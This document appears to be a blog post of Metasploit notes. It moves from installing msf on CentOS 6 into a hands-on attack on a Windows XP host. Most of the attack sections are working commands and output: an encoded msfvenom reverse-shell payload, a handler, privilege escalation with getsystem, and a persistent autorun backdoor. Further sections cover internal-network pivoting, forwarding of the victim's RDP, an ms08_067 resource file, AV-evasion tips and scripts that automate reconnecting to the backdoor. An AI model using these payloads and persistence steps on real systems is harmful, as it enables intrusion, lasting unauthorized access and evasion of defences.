metasploit

Notes on some commonly used Metasploit (msf) things.

Setting up the msf environment on CentOS 6

My Tencent Cloud student VM, which I normally use for forwarding, has only 1M of bandwidth... forwarding to my physical machine drops the connection all the time, and I don't know whether cutting out that one hop and working directly on the VM would ease it a bit.
For each package below, browse the download directory first, change the version in the URL and install the latest one.
Update the packages:

yum -y update
yum -y upgrade

CentOS version:

[root@VM_28_164_centos ~]# cat /etc/issue
CentOS release 6.8 (Final)

Installing msf

Install the dependencies

yum groupinstall 'Development Tools'

yum install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel wget

Install Ruby (libyaml first, Ruby's psych extension needs it):

cd /usr/src 

wget http://pyyaml.org/download/libyaml/yaml-0.1.6.tar.gz

tar zxvf yaml-0.1.6.tar.gz 

cd yaml-0.1.6

./configure --prefix=/usr/local

make && make install

cd /usr/src 

wget http://ftp.ruby-lang.org/pub/ruby/2.2/ruby-2.2.1.tar.gz

tar zxvf ruby-2.2.1.tar.gz

cd ruby-2.2.1

./configure --prefix=/usr/local --with-opt-dir=/usr/local/lib

make && make install

Install PostgreSQL:

Add the line exclude=postgresql* to the [base] and [updates] sections of /etc/yum.repos.d/CentOS-Base.repo so the distribution's own PostgreSQL packages do not shadow the PGDG 9.4 ones:

exclude=postgresql*

wget http://yum.postgresql.org/9.4/redhat/rhel-6-x86_64/pgdg-centos94-9.4-3.noarch.rpm

rpm -ivh pgdg-centos94-9.4-3.noarch.rpm

yum update 

yum install postgresql94-server postgresql94-devel postgresql94

service postgresql-9.4 initdb 

service postgresql-9.4 start

chkconfig postgresql-9.4 on

echo 'export PATH=/usr/pgsql-9.4/bin:$PATH' >> /etc/bashrc

source /etc/bashrc

su - postgres

createuser msf -P -S -R -D 

createdb -O msf msf

exit



vi /var/lib/pgsql/9.4/data/pg_hba.conf
Add the following three lines ABOVE the stock rules. pg_hba.conf is evaluated top to bottom and the first matching line wins, so if they are appended at the bottom the stock all/all lines (peer/ident authentication) match first and the msf password login fails. Use /32 for the loopback address, not /8, which would admit the whole 127.0.0.0/8 range:
local    msf             msf                                     md5
host     msf             msf             127.0.0.1/32            md5
host     msf             msf             ::1/128                 md5

service postgresql-9.4 restart
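Because pg_hba.conf is first-match, placement decides which rule a login hits. The following POSIX shell function is an added example (not from the post or from PostgreSQL) that simulates that first-match evaluation for IPv4 connections, so you can check the effective rule before restarting the service. The two embedded configs are constructed: one with the msf lines appended after the stock CentOS rules, one with them placed first.

```shell
#!/bin/sh
# Added example: simulate PostgreSQL's first-match evaluation of pg_hba.conf
# (IPv4 only). PostgreSQL stops at the FIRST line whose type, database, user
# and address all match and uses that line's auth method; later lines are
# never consulted, which is why appending rules at the bottom can be a no-op.

# Constructed pg_hba.conf in the stock CentOS layout with the three msf rules
# appended at the bottom, as the post originally described. Not a real file.
PG_HBA_APPENDED='local   all   all                  peer
host    all   all   127.0.0.1/32   ident
host    all   all   ::1/128        ident
local   msf   msf                  md5
host    msf   msf   127.0.0.1/32   md5
host    msf   msf   ::1/128        md5'

# The same rules with the msf lines placed above the stock catch-all rules.
PG_HBA_FIXED='local   msf   msf                  md5
host    msf   msf   127.0.0.1/32   md5
host    msf   msf   ::1/128        md5
local   all   all                  peer
host    all   all   127.0.0.1/32   ident
host    all   all   ::1/128        ident'

# pg_hba_method CONF_TEXT TYPE DATABASE USER [CLIENT_IPV4]
# Prints "<method> (line N)" for the first matching rule, or "no match".
# TYPE is "local" (Unix socket, no address column) or "host" (TCP).
pg_hba_method() {
  printf '%s\n' "$1" | awk -v t="$2" -v d="$3" -v u="$4" -v a="${5:-}" '
    function ip2int(s,  o) { split(s, o, "."); return ((o[1]*256 + o[2])*256 + o[3])*256 + o[4] }
    # in_cidr(ip, "net/bits"): equal after discarding the (32 - bits) host bits
    function in_cidr(ip, cidr,  p, keep) {
      split(cidr, p, "/"); keep = 2^(32 - p[2])
      return int(ip2int(ip) / keep) == int(ip2int(p[1]) / keep)
    }
    /^[ \t]*(#|$)/ { next }                        # comments and blank lines
    $1 != t { next }                               # local vs host
    $2 != "all" && $2 != d { next }                # database column
    $3 != "all" && $3 != u { next }                # user column
    t == "local" { found = 1; print $4 " (line " NR ")"; exit }
    a ~ /^[0-9.]+$/ && $4 ~ /^[0-9.]+\/[0-9]+$/ && in_cidr(a, $4) {
      found = 1; print $5 " (line " NR ")"; exit
    }
    END { if (!found) print "no match" }
  '
}
```

With the appended layout, a TCP login as msf from 127.0.0.1 hits the stock ident line, never the md5 one; with the msf lines first it gets md5. The same function also shows why /32 matters: a 127.0.0.1/8 rule matches every 127.x.x.x client.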

gem install wirble pg sqlite3 msgpack activerecord redcarpet rspec simplecov yard bundler


Install Metasploit:

cd /opt 

git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

ln -s /opt/metasploit-framework/armitage /usr/local/bin/armitage

bundle install

vi /opt/metasploit-framework/database.yml
Write the following (the keys under production: must be indented, every colon must be followed by a space, and the password is the one given to createuser -P above):
production:
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5

echo 'export MSF_DATABASE_CONFIG=/opt/metasploit-framework/database.yml' >> /etc/bashrc

source /etc/bashrc

msfconsole should now start with the database connected (db_status confirms it).
msfupdate  updates msf
service postgresql-9.4 start  starts PostgreSQL
chkconfig postgresql-9.4 on  adds it to the startup services

Persistence

msf has two persistence modules:

  • Persistence

  • Metsvc

metsvc runs the backdoor as a Windows service on the target and listens on a port; it is easy to spot, and it has no authentication at all, so whoever finds the port can connect to it.
Persistence is preferable: the agent connects back to your handler instead of listening, and the help text below shows the three ways it can be started, as a service at boot with SYSTEM privileges (-S), from the HKLM Run key (-X), or from the user's Run key at logon (-U). Note that Run keys fire at interactive logon, not at boot, which is why in the test below the session only returns once someone logs on to XP.

attacker: CentOS 6.8, metasploit v4.14.3-dev-06e6a97
victim: Windows XP SP3

Generate the exe:

msf > msfvenom -p windows/meterpreter/reverse_tcp -a x86 --plat windows LHOST=My_ip LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o test.exe

Listen:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > ifconfig 
[*] exec: ifconfig 

eth0      Link encap:Ethernet  HWaddr 52:54:00:16:00:8A  
          inet addr:10.104.28.164  Bcast:10.104.63.255  Mask:255.255.192.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:135178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86073 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11693157 (11.1 MiB)  TX bytes:15675660 (14.9 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:4456 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1319131 (1.2 MiB)  TX bytes:1319131 (1.2 MiB)

msf exploit(handler) > set lhost 10.104.28.164
lhost => 10.104.28.164
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.104.28.164:6666 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (957487 bytes) to xx
[*] Meterpreter session 1 opened (10.104.28.164:6666 -> xx:26443) at 2017-03-20 08:09:56 +0800

Note that the handler's LHOST must be an address actually bound on the box, here the private 10.x address (or 0.0.0.0); the cloud public IP is NATed to the VM and is not on any interface, so binding to it fails. The public IP belongs in the payload's LHOST (My_ip above), because that is the address the victim connects to.
exploit -j -z runs the handler as a background job and does not drop into the session as soon as it opens.

Next, escalate to SYSTEM and set up persistence

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                                      Connection
  --  ----                     -----------                                      ----------
  1   meterpreter x86/windows  DH-CA8822AB9589\Administrator @ DH-CA8822AB9589  10.104.28.164:6666 -> xx:26443 (10.10.10.131)

msf exploit(handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

msf post(persistence_exe) > sessions 1
[*] Starting interaction with 1...

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run persistence -X -i 50 -p 6666 -r my_ip

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DH-CA8822AB9589_20170320.1305/DH-CA8822AB9589_20170320.1305.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=my_ip LPORT=6666
[*] Persistent agent script is 99680 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nqzUjRnXytp.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nqzUjRnXytp.vbs
[+] Agent executed with PID 3324
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lbKsQWfuWoXMZ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lbKsQWfuWoXMZ
meterpreter > background 

The write succeeded. Then reboot XP with shutdown /r /t 0 and the session dies.

[*] Backgrounding session 1...
msf post(persistence_exe) > [*] 10.10.10.131 - Meterpreter session 1 closed.  Reason: Died

After logging in to XP, the session comes back.

msf exploit(handler) > [*] Sending stage (957487 bytes) to xx
[*] Meterpreter session 2 opened (10.104.28.164:6666 -> xx:45667) at 2017-03-20 08:17:37 +0800

If there is AV on the target, migrate into a process the AV trusts first, then run the script. Migration may be blocked too; in that case try dumping hashes or plaintext credentials, RDP in over 3389 and add the agent to the AV whitelist by hand. If enabling 3389 is blocked, run getgui -e to turn it on.

This persistence has two advantages. First, after the target reboots the agent comes back to the listener without running the exe again.
Second, after my msf restarts, listening again brings the session back too. Because this is set up on a VPS that drops offline constantly, the session used to die and I had to go through the whole process every time; that problem gave me a real headache before, and now it is much more convenient.

I also tested this module in Kali inside a VM, but it failed; Googling around says it is Kali's fault, and I did not find a fix.

References:
https://sathisharthars.com/2014/05/24/create-a-persistence-backdoor-after-exploit-in-windows-os-using-metasploit/
http://www.ztik.nl/doku.php?id=blog:metasploit

Proxying and forwarding

Routing table

Usually, after getting a session, the next steps are privilege escalation and probing the internal network. msf provides a routing table that makes internal probing very convenient.

First, list the target's local subnets:

meterpreter > run get_local_subnets 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 1.0.0.0/255.0.0.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.0/255.255.255.0

Add the route; -s takes the subnet (the netmask defaults to 255.255.255.0, -n sets another). Pass the network address, 10.10.200.0; the host address used below was accepted too, but the network form is what the route table is meant to hold:

meterpreter > run autoroute -s 10.10.200.1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.200.1/255.255.255.0...
[+] Added route to 10.10.200.1/255.255.255.0 via xx
[*] Use the -p option to list all active routes
meterpreter > background 
[*] Backgrounding session 4...

View the routing table:

msf exploit(handler) > route 

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.200.1        255.255.255.0      Session 4

[*] There are currently no IPv6 routes defined.

The route is in place and the internal network can now be probed.
The msf routing table decides which session a connection is relayed through: when a module connects to an address in a routed subnet, the framework opens the connection from the Meterpreter host instead of from the attacker's own network stack.
Only connections that go through the framework's socket layer are pivoted, so TCP connect scans (auxiliary/scanner/portscan/tcp) work, while SYN scans that craft raw packets bypass the route; my attempt at a SYN port scan through it failed.
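The get_local_subnets output above repeats the same subnet and mixes in a non-private range, and the route was added with a host address. As an added example (not from the post or from Metasploit), the shell function below turns that output into msf route add commands for a session: it masks the host bits off, deduplicates, drops empty masks, and comments out anything outside RFC 1918 space so public ranges are not silently pivoted. The embedded sample is constructed from the subnets the post's session reported; the session id 4 is the one shown there.

```shell
#!/bin/sh
# Added example: turn the output of `run get_local_subnets` into msf `route add`
# commands for one session. It deduplicates repeated subnets, masks the host bits
# off so a host address such as 10.10.200.1 becomes the network 10.10.200.0,
# drops 0-bit masks, and comments out any subnet outside RFC 1918 space so that
# public ranges are not silently routed through the pivot.

# Constructed from the subnets the post's session reported (session id 4 there);
# the repeated and host-address lines are kept on purpose to show the cleanup.
SUBNETS_OUTPUT='Local subnet: 1.0.0.0/255.0.0.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.1/255.255.255.0'

# route_cmds SESSION_ID   (reads get_local_subnets output on stdin)
route_cmds() {
  awk -v sid="$1" '
    function ip2int(s,  o) { split(s, o, "."); return ((o[1]*256 + o[2])*256 + o[3])*256 + o[4] }
    function int2ip(n) { return int(n/16777216)%256 "." int(n/65536)%256 "." int(n/256)%256 "." n%256 }
    # prefix(mask): number of leading 1 bits in a dotted netmask
    function prefix(mask,  m, b) {
      m = ip2int(mask); b = 0
      while (m >= 2147483648) { b++; m = (m - 2147483648) * 2 }
      return b
    }
    # rfc1918(n): 10.0.0.0/8, 172.16.0.0/12 or 192.168.0.0/16
    function rfc1918(n) {
      return (n >= 167772160 && n < 184549376) ||
             (n >= 2886729728 && n < 2887778304) ||
             (n >= 3232235520 && n < 3232301056)
    }
    /^Local subnet: / {
      split($3, p, "/"); bits = prefix(p[2])
      if (bits == 0) next                         # 0.0.0.0/0 or a malformed mask: nothing to pivot
      keep = 2^(32 - bits)
      netaddr = int2ip(int(ip2int(p[1]) / keep) * keep)
      key = netaddr "/" bits
      if (seen[key]++) next                       # same subnet reported more than once
      cmd = "route add " netaddr " " p[2] " " sid
      if (rfc1918(ip2int(netaddr))) print cmd
      else print "# not RFC 1918, review before adding: " cmd
    }'
}
```

Feed it the saved script output, e.g. printf '%s\n' "$SUBNETS_OUTPUT" | route_cmds 4, and paste the result at the msf prompt or into a resource file; the commented line for 1.0.0.0/8 is there to be looked at, not run blindly.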

Some commonly used modules:

  • auxiliary/scanner/portscan/tcp

  • auxiliary/scanner/smb/smb_login

  • auxiliary/scanner/smb/smb_enumusers

  • auxiliary/scanner/mssql/mssql_ping

  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version

  • auxiliary/scanner/ftp/ftp_version

  • auxiliary/scanner/ftp/anonymous

  • auxiliary/scanner/snmp/snmp_login

  • auxiliary/scanner/vnc/vnc_none_auth

  • auxiliary/scanner/mssql/mssql_login

  • exploit/windows/mssql/mssql_payload

Port forwarding

portfwd
This is handy too; it is usually used to forward the target's 3389 out after getting a session.
For example, forward 3389 to local port 33891:

meterpreter > portfwd add -l 33891 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: :33891 <-> 127.0.0.1:3389

Connecting to port 33891 on the VPS is now the same as connecting to the target's 3389 (-r is resolved on the target side, so 127.0.0.1 means the compromised host itself; any host it can reach can be given instead). Note that the relay listens on every interface of the VPS (the ':33891' above), so anyone who can reach that port reaches the target's RDP; bind it to loopback with -L 127.0.0.1 and go through an SSH tunnel, or at least firewall the port, since the post connects to it straight from the physical machine.
One problem here: connecting with Windows mstsc.exe gave "Because of a data encryption error, this session will end. Please try connecting to the remote computer again."
rdesktop does not have this problem, but my VPS has no graphical interface, so I can only connect from my physical machine.
Switching to a different mstsc fixes it; the RMDSTC.exe I used connects fine.

SOCKS proxy

Some small tips

set/unset  set/unset an option
setg/unsetg  set/unset a global option
save  save the settings so they are still in effect at the next start

MSF resource files: to shorten testing time, write msf commands into a file and load it in msf.
Loading: the resource command in msfconsole, or msfconsole with the -r option.
Example:
echo 'version' > resource.rc
echo 'load sounds' >> resource.rc
msfconsole -r resource.rc
Example:
echo 'use exploit/windows/smb/ms08_067_netapi' > autoexp.rc
echo 'set RHOST 192.168.1.133' >> autoexp.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> autoexp.rc
echo 'set LHOST 192.168.1.111' >> autoexp.rc
echo 'exploit' >> autoexp.rc
msfconsole
msf > resource autoexp.rc
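A resource file is also the natural answer to the VPS-drops problem from the persistence section: the agent installed there re-dials every 50 seconds, so after a restart the handler should come back with one command, and its LHOST has to be an address the box actually owns (the private 10.x address, not the NATed public IP). The script below is an added example, not from the post: write_handler_rc writes a resource file for exploit/multi/handler and refuses an LHOST that is not bound locally (0.0.0.0 is always accepted). The list of bound addresses normally comes from ip(8) or ifconfig via local_ipv4s, and can be passed explicitly for offline testing; the TEST-NET address 203.0.113.5 used in the check is constructed.

```shell
#!/bin/sh
# Added example: write a resource file that brings the multi/handler back with
# one command (msfconsole -r handler.rc) after the VPS restarts, so the
# persistent agent's next connection attempt finds a listener. It refuses an
# LHOST that is not bound on this host: a NATed public address is not on any
# interface and the bind would fail. 0.0.0.0 (all interfaces) is always accepted.

# local_ipv4s: IPv4 addresses configured on this host, one per line.
# Uses ip(8) when present, otherwise parses ifconfig (both the CentOS 6
# "inet addr:" layout and the newer "inet " layout).
local_ipv4s() {
  if command -v ip >/dev/null 2>&1; then
    ip -o -4 addr show | awk '{ sub(/\/.*/, "", $4); print $4 }'
  else
    ifconfig 2>/dev/null | awk '/inet addr:/ { sub(/addr:/, "", $2); print $2 }
                                /inet [0-9]/  { print $2 }'
  fi
}

# write_handler_rc LHOST LPORT PAYLOAD OUTFILE [BOUND_ADDRS]
# BOUND_ADDRS is a space-separated list of local addresses; it defaults to
# local_ipv4s and is a parameter only so the check can be exercised offline.
write_handler_rc() {
  lhost=$1; lport=$2; payload=$3; out=$4
  bound=${5:-$(local_ipv4s | tr '\n' ' ')}
  case " $bound " in
    *" $lhost "*) ;;
    *)
      if [ "$lhost" != 0.0.0.0 ]; then
        echo "LHOST $lhost is not bound here (bound: $bound); use the private address or 0.0.0.0" >&2
        return 1
      fi ;;
  esac
  # ExitOnSession false keeps the job listening after the first session, so
  # every reconnect of the agent (after a reboot, or after a dropped link)
  # opens a new session without running exploit again.
  cat >"$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}
```

Typical use on the VPS from the post: write_handler_rc 10.104.28.164 6666 windows/meterpreter/reverse_tcp handler.rc, then msfconsole -r handler.rc; the handler runs as a background job and each callback from the -X agent opens a new session.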
